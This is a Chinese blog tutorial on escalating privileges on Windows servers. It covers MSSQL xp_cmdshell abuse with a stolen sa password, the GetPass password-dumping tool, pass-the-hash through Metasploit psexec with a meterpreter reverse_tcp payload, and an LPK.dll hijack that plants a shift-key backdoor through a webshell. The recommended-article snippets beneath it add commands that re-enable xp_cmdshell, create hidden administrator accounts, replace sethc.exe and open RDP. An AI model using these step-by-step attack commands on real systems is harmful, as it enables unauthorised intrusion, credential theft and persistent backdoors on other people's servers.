提权系列(二)----Windows Service 服务器提权之Mssql提权,GetPass提权,hash提权,LPK提权

最新推荐文章于 2024-08-20 17:25:45 发布
最新推荐文章于 2024-08-20 17:25:45 发布
阅读量1.1w 收藏 17
点赞数 3
分类专栏: 网络渗透 文章标签: 网络渗透 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011781521/article/details/68067709
版权

(一)、Mssql提权


必要条件:获取到mssql数据库最高权限用户sa的账号密码


Mssql默认端口:1433

Mssql最高权限用户:sa




得到sa密码之后,通过工具直接连接上去。




MSSQL自带了一个XP_CMDSHELL用来执行CMD命令。


(二)、GetPass 提权


一款获取计算机用户账号密码的工具




(三)、hash传递入侵 msf加载


Hash 算法:windows密码的加密方式

Msf下载:http://www.rapid7.com/products/metasploit/download.jsp


以下使用Kali演示


Msf使用:


msfconsole   //启动终端




use exploit/windows/smb/psexec //用到模块

show options //查看模块选项属性




set PAYLOAD windows/meterpreter/reverse_tcp   //设置漏洞利用载体

Show targets //查看模块的攻击目标属性




set LHOST //设置本机地址
set RHOST 192.168.0.254 //设置属性目标主机地址
set SMBUser administrators //设置属性用户




set SMBPass  xxx  //设置属性密文hash


目标主机的hash怎么获取了?可以通过Pwdump7这个工具来获取hash值




复制以下一段就行了






exploit  //开始攻击



获取当前shell,执行命令






(四)、lpk提权


触发:目录下存在exe文件被执行,他的特点是每个可执行文件运行之前都要加载该文件,windows系统是先判断当前文件目录是否存在此文件,如果目录下存在该文件则执行,如果不存在则会执行system32目录下的dll。


启动方案:3389远程桌面连接启动(连续shift,然后按热键)


提权方案:生成lpk.dll,通过webshell上传至文件目录,等待管理员去触发exe程序。


运行LPK Setch这个工具选择,2键启动,此时的2键3键值为LPK Sethc内置固定的数字,比如65,66就对应a与b。




然后点击生成,将生成的lpk.dll上传至任意目录,并运行其中的任何一个exe文件,lpk.dll将会自动替换为shift后门。

我这里把它生成到了软件的目录,然后点击运行软件




然后远程连接,连续按五次shift键,会出现下面的提示




接着同时按下组合键(也就是在哪里设置的65,66,对应的A,B),就会出现下面的密码框




输入密码,就会进入下面的界面!!!




还可以用来执行软件,比如用来开3389,在生成lpk.dll是选中




生成lpk.dll然后放到任意目录下,未执行软件之前远程是关闭的




然后执行exe软件,你好发现远程被打开了。







码农致富
关注
专栏目录
Linux脏牛(DirtyCow-CVE-2016-5195)本地提权漏洞复现
玄道的网安博客
11-27 820
简介 Linux kernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。 漏洞概述 Linux kernel 2.x至4.8.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞,该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取权限。 影响版本 从 2007 年发布 2.6.22 版本开始,直到2016年10月18日为止,这中间发行的所有 Linux 系统都受影响 漏洞复现 当前用户为te
网络攻防实战研究 漏洞利用与提权读书笔记
一枚努力的蛋蛋
08-24 3260
网络攻防实战研究 漏洞利用与提权读书笔记第2章 Windows漏洞利用与提权2.1 Windows提权基础2.1.1 Windows提权信息的收集2.1.2 Windows提权准备2.1.3 使用MSF平台搜索可利用的POC2.1.4 实施提权2.1.5 停用安全狗2.2 提权辅助工具Windows-Exploit-Suggester2.2.1 Windows-Exploit-Suggester...
你真的会udf提权???数据库权限到系统权限 内网学习 mysql的udf提权操作 ??msf你会用了吗???
helloKittywz的博客
07-01 873
我们的udf提权和反弹shell提权是类似的,反弹shell就是直接执行命令来建立这些操作,命令是写好了的通过编码进行操作的,也是创建dll文件。与udf提权是类似的。在实际的提权操作还有很多妨碍我们的,我们会遇见很多的,导致提权不成功的操作。mysql的udf提权前提:1:要有数据库密码和账号2:secure-file-priv=空或者写入的路径各个好是我们要写的地方。
redis mysql oracle mssql postgresql提权工具mdut
最新发布
qq_55894976的博客
08-20 450
mdut用于数据库的连接,连接成功后可用户反弹shell,命令执行。
数据库提权--MSSQL
qq_45936617的博客
10-11 805
MSSQL是微软公司开发的数据库,又称为sql server数据库服务器。在基于微软开发的IIS中间件服务器开发的网站,通常使用的就是MSSQL数据库。常见的MSSQL数据库的提权方式有 xp_cmdshell提权、sp_oacrate提权、沙盒提权及JOB提权等,本文学习的是三种提权方式利用原理、利用条件以利用方法。
MSSQL提权
m0_72929851的博客
04-09 246
默认库判断服务器级别判断数据库级别。
Mssql提权
weixin_33810302的博客
05-16 375
一、xp_cmdshell提权 首先使用sqlmap查看是DBA权限,通过xp_cmdshell来执行命令 默认情况下是关闭的,用下边的命令开启 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 如果xp_cmdshell被删除,可...
Windows、数据库提权
zzhokok的博客
09-18 538
Windows提权 用到的命令有哪些? 提权成功后做什么? 数据库提权 怎么获取账号密码? 怎么打开远程连接? 第三方提权 serv-U怎么提权? 其他待扩展。。。。。。
rh-nodejs6-nodejs-getpass-0.1.6-3.el7.noarch.rpm
01-03
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
条件 所谓利用数据进行提权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权: 1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。 2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。 提权基本思路过程与原理 1.MSSQLWindows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比管理员小;而在2003以上的版本,则为最高权限。 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使
1433提权工具sqlTools2.chs.rar
10-23
1、 未能找到存储过程'master..xpcmdshell' 这种情况我看到网上的方法是: 第一步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 2、 原因: 126(找不到指定的模块。)。 修复方法: 第一步: dbcc dropextendedproc ("xp_cmdshell") 第步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第三步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 直接恢复,不管sp_addextendedproc是不是存在 3、 Error Message:SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 修复方法:分离器上执行 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 4、 net提权出现 拒绝访问 可以尝试一下net1 user 用户 密码 /add 如果net1也是拒绝访问可以copy一个shfit后门试试执行cmd命令:copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe 如果提示 复制1文件 哪么证明成功了。连接终端然后按5下shift看看蹦出来了什么。玩咔咔 资源管理器,现在只要手工加个用户就好了。 5、 建号 net user chenyu chenyu$ /add net localgroup administrators chenyu /add C:\WINDOWS\system32\dllcache\net1.exe user chenyu chenyu$ /add C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators chenyu /add 5、 开3389 execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
易语言 SQL提权工具 源码
09-16
易语言编写SQL server 2000 提权工具 源码
rh-nodejs6-nodejs-getpass-0.1.6-2.el7.noarch.rpm
01-03
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
Windows提权之Mssql(sql server)数据库提权(xp_cmdshell提权)
mrx56的博客
05-18 1294
利用大马或者webshell管理工具登录mssql数据库,执行以下sql命令检查xp_cmdshell是否存在。也可以利用SQL注入。如果xplog70.dll也删除了可以自己上传一个或者执行以下命令恢复。结果为1,则证明存在。当结果为0时,可以通过下列命令恢复。使用xp_cmdshel执行命令。
数据库提权-mssql通过xp_cmdshell提权
cxrpty的博客
03-12 4549
实验思路:1.MSSQLWindows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比 管理员小;而在2003以上的版本,则为最高权限。 ⭐ 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使用sa连...
提权 - MSSQL/Oracle数据库
acepanhuan的博客
02-28 471
提权 - MSSQL/Oracle数据库
mssql&oracle数据库提权
m0_62207170的博客
03-19 1181
mssql&oracle数据库提权
Python Day3:分支结构与if-elif-else应用实例
- Python使用缩进来表示代码块,这意味着if语句后面跟随的一系列具有相同缩进的语句将作为条件语句的一部分执行。 3. `elif`和`else`的使用: - `elif`(else if)用于添加更多的条件分支,当第一个条件不满足时...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值